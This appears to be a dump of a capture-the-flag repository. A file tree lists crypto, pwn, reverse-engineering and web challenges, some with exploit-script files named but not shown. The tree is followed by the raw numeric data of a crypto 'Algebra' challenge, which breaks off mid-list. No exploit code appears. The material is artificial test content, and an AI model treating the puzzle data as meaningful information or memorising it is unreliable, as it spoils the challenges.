├── Crypto ├── Algebra │ ├── groebnerTask.chall │ ├── keyTask.chall │ └── task.sage ├── Diligent_Liszt │ ├── Diligent_Liszt.zip │ └── exp.py ├── Energetic_Carcano │ ├── Energetic_Carcano_setup.zip │ └── exp.py ├── EzComplex │ └── task.py ├── GoGoCrypto │ ├── GoGoCrypto_setup.zip │ └── exp.py ├── JPGDiff │ ├── JPGDiff.zip │ └── exp.py ├── Just need One │ ├── Just need One_setup.zip │ └── exp.py ├── OTPTwice │ ├── OTPTwice.zip │ └── exp.py ├── OldAlgorithm │ ├── OldAlgorithm.zip │ └── exp.sage ├── PolyRSA │ ├── PolyRSA.zip │ └── exp.py ├── Quick_Robert │ ├── Quick_Robert_setup.zip │ ├── exp.py │ └── pandey14.pdf ├── SignIn │ └── exp.py ├── Simple3DES │ ├── Simple3DES_setup.zip │ └── exp.py ├── SimpleRSA │ ├── SimpleRSA.zip │ └── exp.py ├── card_game │ ├── card_game_setup.zip │ └── exp.py ├── easy_classic │ ├── cipher_1.txt │ └── 加油~.zip ├── ext^7gcd │ ├── exp.py │ └── ext^7gcd_setup.zip └── proof_of_work │ ├── exp.py │ └── proof_of_work_setup.zip ├── Misc ├── .gitkeep └── xqr │ ├── make │ ├── mk.py │ ├── qr_code_syc_hop3.png │ └── qr_code_syc_this.png │ └── toCTFer │ └── xqr.zip ├── Pwn ├── .gitkeep ├── EVA │ ├── EVA │ ├── ld-2.31.so │ └── libc.so.6 ├── elevator │ ├── elevator │ ├── ld-2.31.so │ └── libc.so.6 ├── ez_fullprotection │ ├── ez_fullprotection │ ├── ld-2.31.so │ └── libc.so.6 ├── ezpwn │ ├── docker │ │ ├── Dockerfile │ │ ├── bins │ │ │ └── pwn │ │ ├── busybox │ │ ├── run.sh │ │ └── start.sh │ └── exp.py ├── fmt1.0 │ ├── fmt1.0 │ ├── ld-2.31.so │ └── libc.so.6 ├── fmt2.0 │ ├── fmt2.0 │ ├── ld-2.31.so │ └── libc.so.6 ├── fmt3.0 │ ├── fmt3.0 │ ├── ld-2.31.so │ └── libc.so.6 ├── mips │ └── mips.zip ├── nc_pwntools │ └── chal ├── password │ └── password ├── ret2libc │ ├── chal │ ├── ld-linux-x86-64.so.2 │ └── libc.so.6 ├── ret2text │ └── ret2text ├── white_canary │ ├── chal │ ├── ld-linux-x86-64.so.2 │ └── libc.so.6 ├── why_n0t_puts │ ├── ld-2.31.so │ ├── libc.so.6 │ └── why_n0t_puts ├── write1 │ └── chal └── write_2 │ └── chal ├── README.md ├── Re ├── .gitkeep ├── AES?AES! │ └── AES.zip ├── ezandroid │ └── ezandroid.apk ├── flower-or-tea │ └── flower-or-tea.zip ├── mySelf │ └── 因何存在.zip ├── rainbow │ └── rainbow.tar.gz ├── shiftjmp │ └── shiftjmp.zip ├── yakvm │ └── yakvm_geek2023.zip ├── 听说cpp很难 │ └── 听说cpp很难.zip ├── 寻找初音未来 │ └── 寻找初音未来.zip ├── 小黄鸭 │ └── 小黄鸭.zip ├── 幸运数字 │ └── 幸运数字.exe ├── 点击就送的逆向题 │ └── 点击就送的逆向题.zip └── 砍树 │ └── 砍树.apk └── Web ├── .gitkeep ├── EzRce ├── Dockerfile ├── flag ├── sources.list ├── src │ ├── index.php │ └── waf.php └── wp │ ├── 1.php │ ├── 1.py │ └── xor_rce.txt ├── ezpython ├── .idea │ ├── .gitignore │ ├── inspectionProfiles │ │ └── profiles_settings.xml │ ├── jike1.iml │ ├── misc.xml │ └── modules.xml ├── Dockerfile ├── src │ ├── .idea │ │ ├── .gitignore │ │ ├── inspectionProfiles │ │ │ └── profiles_settings.xml │ │ ├── misc.xml │ │ ├── modules.xml │ │ └── src.iml │ ├── __pycache__ │ │ ├── app.cpython-311.pyc │ │ ├── test.cpython-311.pyc │ │ └── waf.cpython-311.pyc │ ├── app.py │ ├── requirements.txt │ ├── static │ │ ├── 1.jpeg │ │ ├── 1.webp │ │ ├── 2.avif │ │ ├── 2.webp │ │ ├── 4.avif │ │ ├── beijing.jpg │ │ ├── syc.jpg │ │ └── weixin.png │ ├── templates │ │ ├── flag.html │ │ ├── index.html │ │ ├── login.html │ │ ├── register.html │ │ └── welcome.html │ └── waf.py └── start.sh ├── ezrfi ├── Dockerfile ├── ffffffllllag ├── hint.py ├── index.php └── sources.list ├── klf_2 ├── .idea │ ├── .gitignore │ ├── inspectionProfiles │ │ ├── Project_Default.xml │ │ └── profiles_settings.xml │ ├── misc.xml │ ├── modules.xml │ └── www.iml ├── Dockerfile ├── docker-compose.yml ├── hello │ ├── nonono │ └── ssti │ │ ├── .idea │ │ ├── .gitignore │ │ ├── inspectionProfiles │ │ │ ├── Project_Default.xml │ │ │ └── profiles_settings.xml │ │ ├── misc.xml │ │ ├── modules.xml │ │ └── ssti测试.iml │ │ ├── app.py │ │ ├── hahahaha │ │ ├── requirements.txt │ │ ├── static │ │ └── robots.txt │ │ └── templates │ │ ├── index.html │ │ ├── klf.html │ │ └── win.html └── replace.sh ├── klf_3 ├── .idea │ ├── .gitignore │ ├── inspectionProfiles │ │ ├── Project_Default.xml │ │ └── profiles_settings.xml │ ├── misc.xml │ ├── modules.xml │ └── www.iml ├── Dockerfile ├── docker-compose.yml ├── hello │ ├── nonono │ └── ssti │ │ ├── .idea │ │ ├── .gitignore │ │ ├── inspectionProfiles │ │ │ ├── Project_Default.xml │ │ │ └── profiles_settings.xml │ │ ├── misc.xml │ │ ├── modules.xml │ │ └── ssti测试.iml │ │ ├── app.py │ │ ├── hahahaha │ │ ├── requirements.txt │ │ ├── static │ │ └── robots.txt │ │ └── templates │ │ ├── index.html │ │ ├── klf.html │ │ └── win.html └── replace.sh └── klf_ssti ├── .idea ├── .gitignore ├── inspectionProfiles │ ├── Project_Default.xml │ └── profiles_settings.xml ├── misc.xml ├── modules.xml └── www.iml ├── Dockerfile ├── docker-compose.yml ├── hello ├── nonono └── ssti │ ├── .idea │ ├── .gitignore │ ├── inspectionProfiles │ │ ├── Project_Default.xml │ │ └── profiles_settings.xml │ ├── misc.xml │ ├── modules.xml │ └── ssti测试.iml │ ├── app.py │ ├── requirements.txt │ ├── static │ └── robots.txt │ ├── templates │ ├── index.html │ └── klf.html │ └── thisfaklg └── replace.sh /Crypto/Algebra/groebnerTask.chall: -------------------------------------------------------------------------------- 1 | [175336555462486363373099551411803174933803940918372428249159666803182759268063415863987676455854054651631174131625763475189413468427467197699058719725221879406119373683175842618465694427132003565774900609456204965408254598477034791500576573579131820364396996254469692964946065509325801687720344376041097328929, 192597139210277682598060185912821582569043452465684540030278464832244948354365, 5415723658972576382153559473862560277755192970021711034483296770242757614573901416501357332661976379693731699836578087114136761491831672836130172409491889, 210713951733721296094981135225517096332793112439184310028590576805069783972692891743044656754643189870169698041576462365740899368554671164493356650858567594970345928936103914826926922045852943068526737627918609421198466329605091625, 93558120697660628972553751937347865465963385519812302371069578286123647411810258547153399045605149278436900736665388355004346922404097196048139360206875149390218160164739477798859206611473675859708579299466581718543909912951088772842957187413726251892347470983848602814387339449340072310561011153714207338630] -------------------------------------------------------------------------------- /Crypto/Algebra/keyTask.chall: -------------------------------------------------------------------------------- 1 | {'p': 76231309481023608274751321361920497941621991893430257210800219032855778863403, 'M': [16697564195803960524955618666471317999653475911677692593955332155554421639339, 24805565422829448264880670396335760401288936419812226622903667065319545007990, 30402002570955975554182190550978255206265920770702396357369433463733972557272, 18233447181850080393551606050467637029754113002670714480589747787334593064733, 592902654848011644470609316176765466448791324270572419003746985532591397159, 38141098394328701291718984482265005575605052524114181112646883764482370463339, 19538035520885458475321686600845898258764219979337957736187681124215270558985, 20238271906530455379759697476409410947082642723781332031138364999846953950236, 68589425835163943859976893853743850381901810189392551426919445548155584771402, 69125498641336015332539393144100425718253100049458707350849969745083544909112, 13083949682120928694566559154939525096970647194043481405708057328879273858093, 23203059113121714797053512829874540997525934591781746540284169378085299649376, 22946531388117317614240915936458387347604741596963582908127101794515625023753, 55979468873975052067342467012297454154725653733173077039679834697623008679331, 30639339327762413454972420838209328855396759486202041356245020097084204753692, 72148374844384373140537647811727349763363643424440303708852930034097897492230, 70510577909447876165042155961990008987054640378802283966455273008397938569580, 7816397571019557637378232515822996961951657038149768517938709736489000871357, 71385034180207364002198196251789729137138388141957414602914243475029669555970, 23879618498527644070533133010929524881849183976915843192427726963620597127184, 17735043770749200859447594711305199064407694651519169622831117483831984480389, 23976962869545273044554865578229826802425540170337686767966000016386989130328, 4813526999083764015441613591159575786598306005687621653546973702651642297987, 35706013043056210868734160987149285571667410945166974218110532901324694790051, 61287332127924004349826780222152798665251527987557191801341744495498699149681, 59806212087395698267045456744835084402906230530501342953461649545673934834285, 66657482821382875051224147598709239153115890794174921121727576548156129458938, 69377007797894976274149732824887445461573605559150837203792733121879383465089, 1737071528731565332746911257107778493680445360545221708263762514076835879060, 26379023925512924142330791649751372084816373260080785068747794883981639940564, 39720534772339542897383195711251081371637848641782146840418654967747820062275, 31820568864325484588454986704171504530172236531705504762063219235205599726436, 11412415614112198143545742456902967000465243935062267743559791535435529553163, 32772401021478158811568824426072680656457459212208695033707655574301149228189, 36613809529642944778053478223817784061231181494093237801141665942724705342255, 28439197371291309320639184774010673215730459728641992931504270331352037006301, 49994376135260323921300737379653415875790622538378466317921425504902713119203, 52981071203712051253827242322882615499169952108221727146381229246217507758656, 5368198640133799911534404960909130528742165283715085781170378320545249444728, 71257635543006090454988064080839484336932780804977796104506518470528524267977, 49939544868670555386879967918014313156769501676987773456158169289120020853127, 5513849182743515680002710310848843523475129560643091243794997576549106529466, 30311080181622378163675117234336217803120444223514680794613361255903563546728, 47253144424515535707960287619419823112290982665649838216591721966391572553422, 16575095774038994598908811620087695957027774942428306451930642072988256096088, 47172637987883100907600422604046275130022245811783645092074076667564229591509, 53713237639725683804264174932950491311170902993545808552164800199466276547267, 49487719557414168923381121834394720035219644265706614752390389709105440461013, 25748413371892143171911671353160744041253936659875378210032853927568421372570, 18008028845121322299690631964537137436508497132161626102200990344058453799889, 16865923878308840204551239186825547977455975788266115306396389734737296847085, 19731302167241507517327528775906606230203827145542596977849114707067863875306, 40024901439773791188244711248598957442287420749738843516966316385631890601402, 62075661595095737466614940938346709962838454659631028910757881824583540487566, 20288133589575545550261734425136279824898448287826254319546558610232798725973, 18396337599190064130575563735025697756345644312687861801231441717383177428297, 61662649332383590957920197518379762321289652000599447145306018866100644631766, 47297278799506827936460165998522491497020441120637980131964545819062452000973, 2434481804300022098577582940503850118123308379606916558865314346784339559741, 61460717710239239905767696511877571142159463848530251055586626280454830469072, 38218092905624483835554011371470317993625264372465695584358397202189822877524, 3809308445935104222618133270413897838642480016918582790324761590850768301189, 60169484708414410769331696939509588791672824220639550859073548144342970942988, 15271709649738561680228696342185966023088016417410635809886804641185459695129, 66155017267527705428216922418146119778993818507134962459291676926961980199387, 40582325144361815094579454299209449255300583137755409783698034905476467214705, 7194805288765133581009538431376085998358337085730757398024738539141630962571, 51248452708770457503524460344461222094049441723589286717211964782544227354571, 22498197147885926650572737244750672660840424112765335329871216585556016078622, 19260029934620867188413402870565199213401541118545012025905327078018757276590, 72765401981342793804926955474372068906021406824027837530797739114362593491810, 26557733709775965549141892813261411879509070986449185646889308782249756249916, 75882964734763534706470590708116855183211267542251854842893942812696713968262, 65558131748560689919247533082377923318035739956508689196452998649978595186348, 67829993253688380288988780892768011398698114976114299036143341260518905341737, 16951826980977800861862157989815519885040882739074799726885358140199464697314, 32446755357113992870476957889986702460677003223490414366121640836329037752178, 12249592801055447145409227586142616644156448960361415580962075899504462831768, 67754539010843962660507454221523396504435027352823732054707137518864699178042, 70297827395682032833886772783589786140334218212649181539008979052239234639121, 54916877002052785044471094178468452023757703561016947516347687003813589699916, 69878767045339462957533288607625091900151500688613054221901486304429504671185, 66676699190226984651524622074479431262031540827948817625722859822091518488776, 37343359862502607786043285225073441136188109619529666103637343139525624099037, 69617008840230800774027983202746530662060112473037948560718889791912835927617, 34023459442316105245449622177764320035562291674808673245390486237383753730372, 58836217736932714605695150144545967912160645465028878381545601614754647665960, 59222748784277372772691372984001892824676042244406474647651454241867636982425, 51291183560520843117691150179745095319132263026055872920338388401683396576465, 34161743303094177732273633757443540558673772088482702756673380560373237718795, 34307131145857277718970084816120044947475446756190646647128645192254530721466, 40619186027026335519058147342009392171397856667529112161579765965818461803556, 38969816660406704957262595675482436498421224818936997122425666698567944719644, 40794121792346281796042418182247410063476511606792164833602224462315579047113, 42873094892829318419396887766229282312457081646096347608094509056075735751292, 59931536990963806751890878460380001382300908207154685797724146604005535427389, 26755875060247483082325535695838083770840387919703205792533687755344379394946, 43367143477175416179546646554235024477454387951599453206015050420503396068459, 42786261278310437859972967186896802622955631346091442879938560902191751939666, 32011605834951861381124123053237156531666295421317693417540887608617755500393, 13404880414951683157677928762115608923254793039749942268608296355486752433132, 11877089900228767684891740308804612746605973897075293419611769384342085758411, 27800240708207112469881110853080993649227712650342675861846262212114171421602, 21663581286219835659381271690002813806524703558064974946660379562231450045703, 51974697598961421376559503657823500883117393940660528716837501860648953054355, 6852742579645192782976681029352809589256614923690966236485757863903554035069, 35855739391011276573763391944486554053477241405378310460038837239370814911199, 25499317411645301621939591842312017864107631600944631297145405267790992692014, 5562131306962862994694660621066163309781065393286926932973088057349402319588, 40757942292495250026613925560811211396043227754440416656002665366852555641446, 18002370353172907998059655813638034919853029188826297237387499099629866542454, 39726689200477117673969486403738222570493365361037768374891829430070697803130, 35000135749383571988936158002043170360320337395381038811684971059559128511827, 5641310335570452388651829312936977441078446226495322610431425645339515285489, 60299748799261773479293910979569271438153013125421405725240125178140926053077, 43236034650568428166127856787899498356720414303783169784893885140891897481142, 69522811767745688129234716889716393878934461214025015629400440813257866985926, 62606640448879579972364732068956807349875925982230691648601606744009474947413, 26331285333678560461768318775460827655967933143330152424507184311854947970495, 2615412910278288709156419324276628765375142098301549535618716916032933841018, 1307892460631304569176307753782952310781666613146568927700279439753116859497, 15824651092623867390178475089970118874597630604021225496161544986644731672756, 47659224500120332057240483014529343778388581379297920665421402048441870895252, 51961864134409826142298014140833527652846234416148386918337416218362423427080, 639612686356673570435510441554421795484284145741835048078758652344450124205, 44137808563133710484189150226489053077979585402607831461142023833300560983894, 20115680634645545703803838311574504684652017307676066365011322088032653451054, 23453961374784154821574492914078706218399840238650137887046369876199717640181, 16900806176672163513368898482296275590742399269083482708344531116968904768746, 1033088239828057573934670025891372224995692390599610312154257552196539477228, 37529301212534088685439177351330248471189442148240970641467457998586018600828, 44758658558670428403704358314309089462537518462726001659629731149466886078366, 52531643561197004188179872503729166603975825497103871211472449723704365462397, 39100228068624208345956366306901887462499286634213553058495856303286399680759, 50084656888221865079923599398760080915088064018016395343407634834125281280594, 28032921509707666624060117053276138115957884170215722353372618599407776800318, 57114338186298325807231621434178101761011329483434004023292009415865817538443, 39958000825797431172033845591817417570124784702159857760068966672182242295044, 37975443995963359152259095549178743095281699999555734577840897697983385485508, 3859860826226346586118043402553604028339335048800976779370409309677283839561, 19776331828369039090338830259040913447049235836451080607341980414646928869035, 63362121603058759116851239353365138616548125502014054189583403052688368426366, 8417124938922096613738885001645171001893699423265701100265134643476256258769, 2528187862792013482327567161109437558476612366439226244624203613981198708409, 28439815484745649368170695869546901757055520618328133349460090475484778312430, 52424412563973386715004013697496582995402355069164803452768326078447171945926, 71211964764567865199498719444172950819839102789370908692811892670877437426546, 4852911497761258167355856839166668386535696525032839475042549640021600874463, 12604599543488979007038941486324219160820800119211235264504484549111970215523, 14707627286207296124221923217783940519267566530301202187069927116743690487231, 54982565303499154789362418217587368496636702638346603109876155421010038344010, 8136431912900558221508147412193693425405229437643936872474370939843895786897, 52527332407379202874730182017643715254519386368271623752276320410620277095724, 27007072982620809725787916921614997193231513388215706309009793746137114597486, 8594259875427565483767528869078604778538149152407620311805971227967328114437, 60909592616766854722440243820060988296182888536109613314378246086444257045038, 70469756657760437903499572874961531430585138343307503284848476358837249550050, 33710378649952477094787277011344679479890816598893733081269348946312192670261, 19390620159429311108580146260490873362545571928758643595249797850575767341180, 50247828125873142034313937116587841918115644881259334859484667323061010135147, 30868931184876169045518788073342820415616390474858684405301699072543537570584, 23023240981699193473119197241876724866648360970395806820123980777916962344896, 23996458076167109084834801710867359513927915053490840030842839568905219284982, 18250665434495752390574979184452774394822264315742771513276269170372150019408, 2259977738410451722290072176978139597380420312125626711897728709864167974754, 12986023697223238031523545123890690074279244756420212561751672410792825364360, 54894463714745000972296348237869203583787411196528486760265537862939294199514, 37425912176878184506602309171583658458580304531171364563977595868021237095470, 68817331576859213436304320718837111677416186125049321255877463964380611433706, 41105143390627550033327279192494325897557771670728209002015094922045099669745, 63934928583418713760166225295375893688887003690690081734249993346317611081637, 29228057983414013083385647342360130522058343918940183242873420195035620061919, 51768792160132206523829040289791168367725211511713749754357818583996335222039, 32361017699666327550854675605653538765736862329416095200206293554393607637178, 40771011482807414204888492411092965367622067483466970242712584516125501592354, 24559438367813844616191475087217959641556195075112204920097346901121612022495, 28307745491110198259585972462019261459810520986249892652055646848825309554089, 18111158553544995743378582759414760595774231715148478706446012211834819048094, 28421161206901194269925617922294395794292746509761316483882233546592347136153, 68717406158762870034008809470702721739259380362818921203097329142749903889938, 15229458325589386287270351151382853513665715937106308511729529127964911372448, 14942961257346694397290743531880253247041391520120289699328554993194557045563, 56610619719645794589483526545092427325007943424492457507726642806493936061120, 61838211614666934910392440139437899360325983389254440010643629845091390969426, 1594630207817741980647680371133186282222244195826653301152099379855923258319, 39976143909302683029489041490306637160569309075129062861551966819113272994712, 63198778084454063566056243507718073288176408462904377832506329417703374070146, 12106776746215767660391184528484652896666605094900738362062329429770054842651, 70815365483499881576286614018289560828420950305307679037066862300925666709076, 34155599479028884409904546003583895555808300446163550648895501635054056483243, 47235041940312918011809632710968083587861944792395258754032944720043870810102, 11279460799877672005900296787855603884675607872517313200118064975802612397768, 10336359859053725303799676741278204219230539377055813682550722881699379229861, 24001433259710425078342861846750174290726772095512137488508098310985095212471, 7049674550373684262241332004630735541515205124083507220219609060235158802362, 50293087769094596576302261723136262446101556859234357197374860380714835632857, 55049561539142876216313528082109703360830592009526950861275669253490310828230, 24097757491647814932703635575963958511960435270387057288022919279012109086946, 62905262489519793240906650770706094701433331951407533976510922812426530634545, 69677625747030426028129240089875897587698802269852416057858391413793141342688, 28568799988015882159268699884165479053773466470198251445036573781621473843607, 48908708556147233348205238806248811526907324429222052931112659501432420733124, 75645908390275198838429192800346989316450137989356358514356982597865735402323, 60082563190048351844513479300762813796897774879268024358374332620104411916700, 16523709897084716737459125942868016279469453232477289276516765378562296165668, 63362549505482113440270099262939883171447274797538467413038944520364119516718, 26107425940292159002767387552475149278576449630558985120740293110004090893066, 2267247306370142331449210449023133969505848688804465371976618588938742175446, 4367582349579199965745584849752141603187801405653615613925001523622566142155, 71950093133753953422498906601803601409176253942448831811229176481313428824498, 59491775987458992228501582198728224766265155377250736591884564966816154899032, 60603274794520656742993725195503379914480534517451590572821020343649638467982, 12147679757794683622978226427989986716096751551025993146428355739926944490440, 9564942415680027280124646717782074670637906402338800428864342404989400083620, 27339035075687488604647651353802720326590480574210101944972930375883335285851, 21434270295179865588755759223298333792492764327605227471509726527574957086689, 38036319876998947747610454429574853328747761761359198496585873873948301686420, 34123071012005686047136416507535007458301856373801379312596381262854885103338, 26183449306325954767319451694773007535947028452350445994452962450262785471064, 33912225671968036455962599919081625150047015745659942172123196765629863143907, 35951020632065220561955396698826855129736709222130294457213709880995671352365, 30836911128127329019286649985341735952042155264997267855059287429460149096712, 69532642164321748473696939934926110085832676040501508996027260847608124929604, 10153079878853181057095274259436557838673301706653496304569888904761813085470, 13781625753984300810645757380400487905125752100752372784422127968148437719278, 67291930985685813727718088546813922299729682094604523855004454973224463379803, 70555628333491515495901306613211926697986451987386228309697345524751289035036, 53743776579048239754672091815633123314443157558369350543865632621816227287151, 68625421652391965076401674288319552477262023233333600080736610161381666691851, 68214961525407801292293774810170138395538315813015551932538265610474221437925, 108478603062379448396313690802578260586826385107457547966246050244586889653, 17850962271100788774733904414554594775032031250721378512309666279413256908100, 68401124053423238180932425785116129488963771067777390166978955053650007539174, 41308379551556870522997409220235826506467243065964428705301174356920983269545, 35460642824488567978742178792618486189604188650094694020645470247987130826009, 25927116776772079082443643840095689541439829653643797584560972580282532908317, 58212563959898367356241812575838609781580536191789263916786248567753460941758, 70081019734967724810472594115638455697796383162699658778850210145643708255055, 7318937013937943870960226972389592496964405573483918794866934831052999095028, 16386827908287810251482644751105836326199438044904669871099956113913486870178, 44601873468153349068313548398267810588501004724502949934074832089403404193285, 72365645959522403941725684789269335063058855406738177913754690862646950182843, 16771218590216980015793511028537692767302331361221481854551078801185971964147, 68498727060778643690889786451596469837396689531508387322367175471815038796235, 66505303613456331676754298818965827467846564046903223059321515134065968853381, 14103339333476369027283355473258973594184113562261155164803092812929087041002, 20149458131055400017813548765524380312378326777003730874778166862385843135367, 68362814397144998600704695153849734582744154023993460510385244305799785134657, 15791666226290439600140036379097225268374927472963559010684326326836557581106, 2252185449620911291377871638232740599539417178811979943420436329728757437052, 47698250136447118891314790959404361946127772532616124382854747980926566462430, 23186489809337051714797650239858764600558333074288416924025717609810056163889, 21764163973610747516126692766788224850151405280591445233076316314640271031882, 66189882479675007489330018463567650013283296464749593201753850526987949975416, 18349197902265641400051516596878539099698311348601920279047947082291648764209, 29534326948897865460972990466686282597968037449340555417908148354665508316311, 30761726002018157035512152020110436286407754168906922494902366469595925911547, 53470811125044570210268948746270880051866921377474524419805212771755689494239, 1718252715648064702128922609242974941733557502883869569146315179232997608448, 11387499294072063445562000942173949715804056241643381896707593832669694543533, 73190917948248307878355032820918428667254963054687203377103984221927729107329, 2754924808123516635322508269025982280348732792397898445374737750901419879892, 18392777520533775974331283458268583436805830250170822504575240887864404631258, 339857287167668726475727582116295455303066302702113718887477375482178913131, 11130644489292701093833211174262004002677773443507897198765923801116993268563, 19773468524801403668141715448569907183978558061962367756724671730514045670455, 30179599682305812383092811956530892131229888859754804552480182525253186087395, 62909185436282889899219419098553455168866163819284667959074524718726911872369, 19869570614667900091191055616123563195066117498648951198937139717994004755597, 74449446783591229529843871225569265771129896105452423402241634527178731886684, 63396677289466168962943044108919946383755210323418106557438390439855351241957, 41416147312741810450511037137963580300734196711090158231991707383784713097055, 54229031375784249713712749426113346917158761981749277572353515835808671169487, 38945934412719839619082893176722242458000574495271560956003825693153480739242, 16487090738884862710253652154283588099287933661516349462768417414855385888090, 43826999507232911403929036770652350249567515586351752321814902084933468871660, 3449200793915057262252455796662993918161789556798535902809795058957527335322, 41264121674084026284499114095557145512985657470422997288055899071338699929779, 64472937693232175320174536529491357253649254539383054954009874341776018343642, 74857293754800965593422507277945520778808275948585663404825604191786154926572, 5815401313116918143006631725509484645775007330033782585202345651872053808595, 37197896408873820874244421420831644361849255252055930907806522921208350775039, 64612516161759831629153934495914308735440301897133178083405160557284431288062, 6559843023820545053855833942571567076667408547751733575865753713103768351388, 23437859458185858514664667165353093105305612490482121637480297616471460022122, 20274295990762879799830790571682510221625279103061049956778950817733880775419, 56401143574723504944509185121746644273583780035351217559257907121927365401449, 49601992218738067701189706997135568168476724951148151719915502090514327693221, 341186914486664186771385431945363659110447477400294501019904692883991885913, 35034547603536685580523474143512924804215389058420557699907258381581548447058, 12200305304384520144709999256812132890182568366360405150906949960405768668212, 39082001882692927976859835410233841784024718778286445924310806205861631259877, 31385899040100510914187053148596292409959170884594053055923974443773698154508, 5835333348903500569738395009368766826900599549472035201775438526032338962832, 8073262852355325014634360942318701107854106520655139805022423637269325030952, 15201395730259063595486794416894052687408854909531507923325451061007646348912, 16427855579354233950275414209580340954569134729882232220122584282551493637784, 14939496218250709237679403125346973587984606820530045006556503486993199165868, 11472018317719132922440196176527154420012451882426166339081202168722507006391, 20562533742066382133554315281828262527674049070006798122553867931071494953097, 28524309930702578392587668311431861542844372396686280497129185069949980697887, 28383799886783235181459389725380167461672465671031363872148608556915934650821, 55858389045107938569827040507629525345474103343481046708180317803708122301591, 60130630314358998201961002540806426109698641115312889893545652213850027383317, 62568703748846586914004173002862196100010439494734550299970402141247677564480, 17072350907727140008641307409070995538642452783348448310992620875418467969325, 73713669713737928408393603793843892467892931893611774363620064726094232766451, 74924693780545798658596704166788134541217378161440448755639826167635348817201, 18868660066305006502591849005871664243845115744730952540180642652276775085293, 62340224361267634006286814100182579622129145288096554244391164203193515881749, 39627274282853089038123962325670720421395853551562914127393792454878764135694, 15875125499294992097449915335526612950522181082288770749491670123007795938830, 60347930680219965971015122873223017639063549778786148029298776837851386632197, 34804246576701738787777230859657047300861773235137871724401221304294655339922, 74533835097703506143597441265411820511880172767129948539794601205386044777692, 14313559485096981913264509436614352434539748805581872239992105363481732829367, 19171789603672277177031372245677531017754944212759999350309655106207957804079, 4968175301831692090292608692629174087333895759761745248376489165274706266140, 66639945794581084754753051281751407776097426324318667075086725551710264930290, 59129622729774783807536138073038505378065074618899090268492550568418148993817, 26330600192574911725030253530674667135249314930010022161561110487432679412346, 37881986704920521195794026228790435554661878645607329970186077787030456659000, 27701963450984409765947049999542882575142094924156220225677307089589870028275, 72583659346427605251468432495168368101442353233014061588652475808297035455520, 12989281482076173982092249100245773192037240577774571153957309897342475222983, 53632058799614335393892361774018122602253084706713924599291134300574903019263, 20629095213919844162761775592879555854908917555384903352158192223392004651847, 56964943703372619910676152072775721540805653363005415107771872381562741955707, 68258175306303746182752585969557329490259603293733362129509064175919040300035, 305059625297334113518421210177084300832046195491993511523415230959150990073, 29627101342558600381782480796033532526842782996378655001684599509787200614166, 63083188609616733628410982115889456461165904638544130382266320173120806597633, 26787135105784799411174671164943806509174770974851864542632539666931383923294, 23066937861699903064575204924379799292078776619882229043415335013240639787814, 45667754933572606110898663979907742452417927316570454983599210687471516167897, 14305984325362513624943911776711156769158238069530207305703314765820164002676, 14831302607678136122176302607664477491230563977695179542864281028342301024710, 51037535846798104819405365682536695438509423898887071739014597105930057998419, 48652369650371740655690259282449880747930148169789680102695166437643005057154, 71492013918335334326695792216149984614913026146966017429260406965750804333399, 16867947212719052891303320067120340503543671114624235990428765330449681436, 73153795081830390833986618172943844382356209528553123455517576050355688776421, 29898811131286422521246118406139753008373279313361851068708215082260704285093, 44380753726589115543898536715604464431803358814745567231003254087023278125824, 28108379633113198575413568955011902702769938460938785967518524380028624994265, 28358289655293158986635669238773905207507920781300060436619119106291970359443, 19920848903341336963434902484854707260554671313892340780418153954186042946379, 56404357261193882915914669050476018754919847279836580731159450057153595235354, 26955068855031090885997069113679442709145027634024379353826028271400627789514, 46919410443478545252523437804442059234017614273672686022027209018874653457945, 57974642082462673365757545097294623041253313070904113609253558507159565225848, 62910748878179883431977765511282925445221478599898014034682117091464608104375, 41825434614169389280942233622574957372686523794041804073185538032682171241299, 39176480473345396556027909249429577014354747976864427429163828423143115456346, 50771776778772460180946616763755986966728800933810714726146848203134035578043, 29634833793005329382601833800465647751190159016124488767981549343135828908568, 65535650339630683132316514902898786158169187634011500515811661482049169399011, 14457898428120714622842227300845828676787455966886884216218691279452858037021, 22751967367776513184207196442050134343461085155210009474278586994560117171204, 11729511490772837953955652665227118752756775424188659305364499215253423715438, 15789566757538937158938105539719000408154428860261010255639736638867095964778, 23240445069758350396695618693843563681627830257032646749119379850633259411290, 28242810972693074985503555116117311832919586119574897405101100504865585369240, 47453559192300590466181957141888962772728479360685128165473991527654656435151, 33039215149084714455769343931369837808821001333724496577370451256478328435103, 53952871349034967709708570687453773705342973975753778136392642600234209153958, 71159230176900090188265538027242589769738350211145076037147065381325814851881, 4295733538115639473511178974431656000491458882726394621256091205289071673747, 14836628031793152342428206106649168865191282879949262432290127036712291876402, 2597748403518739298354922786091066021205791271781959146296009797099187165741, 34927392879121980516322010858985102302769920279321437160145901071908795152354, 62245421549208037106736271122570790927624573878669953062980881715450316959314, 34112996342634610342610203612013397815191296698891267550924352771276390156797, 48361745712066250517413636759572062076329188102394048629020763127684453728224, 53397364219490215140533435564047966604689750181018874401158433933226517921900, 25334047344031509427131399230122578099376953527606993887922799651730761451619, 16205160293342452655841185463276242966521391986484484096730292291693250797604, 55563822793939811662468997513054832756010144395623935190537268603584805644827, 22114349202644461306169184577423044992016896956107066824825973217708308287116, 58695735806144401022975804584348837912162125885447517690557802000538437903378, 62725110257332629707399545726290115276445838074720620323269881894812426240679, 72740545121235936460444862790732485876972138180360176807966637248511390202687, 38864922104503648085491022134186410388141363612131609524900163278961538805733, 6247498858902805956542008003425674825514951325194472192178974156108361402749, 30648166516566441693759932456607317547733476012380883874434122970160880247865, 4575334954291461959300238118233126057327760627427519194764502389800603769311, 26723773897526045578700798200406415810129732323809340593034097219007693767854, 6281037362081143841956572043052603650992335167706387748769908464787308468116, 64286047714880861237184633243002930991489966703054078421265395334582627848932, 33818408610159843439047291985292606030182385527908458939427536161601340606500, 13609013542259741479595055902471609005249306799788738033790269414947854732629, 17536333299559413769278779555899593685006959541248796392802972326814918093248, 18542411638263264709758187416205171006507952876914760112442559278337229190468, 31846307469493034316838689952382906549343543129130420785699083222514237248697, 40592429062450574675035536492279226132878508761351666544199201526262149036841, 16070354072152084171251954256965650868127334909410310239796909435959081936546, 66536651726235320716025905422215915536286975298767682203686010158828435836422, 63270779796490661912896864051407657325313990441210502073013713188722504687202, 50652181520504076157357984563735967695339879803377239175496269836395534982946, 69540558045608743280398490296786655030621238466469982991343921076457859892940, 9841051212527423402731044947747280437008712156236340601824643614196211843274, 12072222018009015572844794012125711875706395783186099114640032625144896635637, 72419230614634083225561970387936606863520709109027207928733198765143960628549, 68236958587200491037437084980978920554330839811562873222255335298700415667849, 59331603199698090304807290138357223750101574056412462750232912383849681378085, 74049416996499094867700938158176620507912183088060301485677228398518810315308, 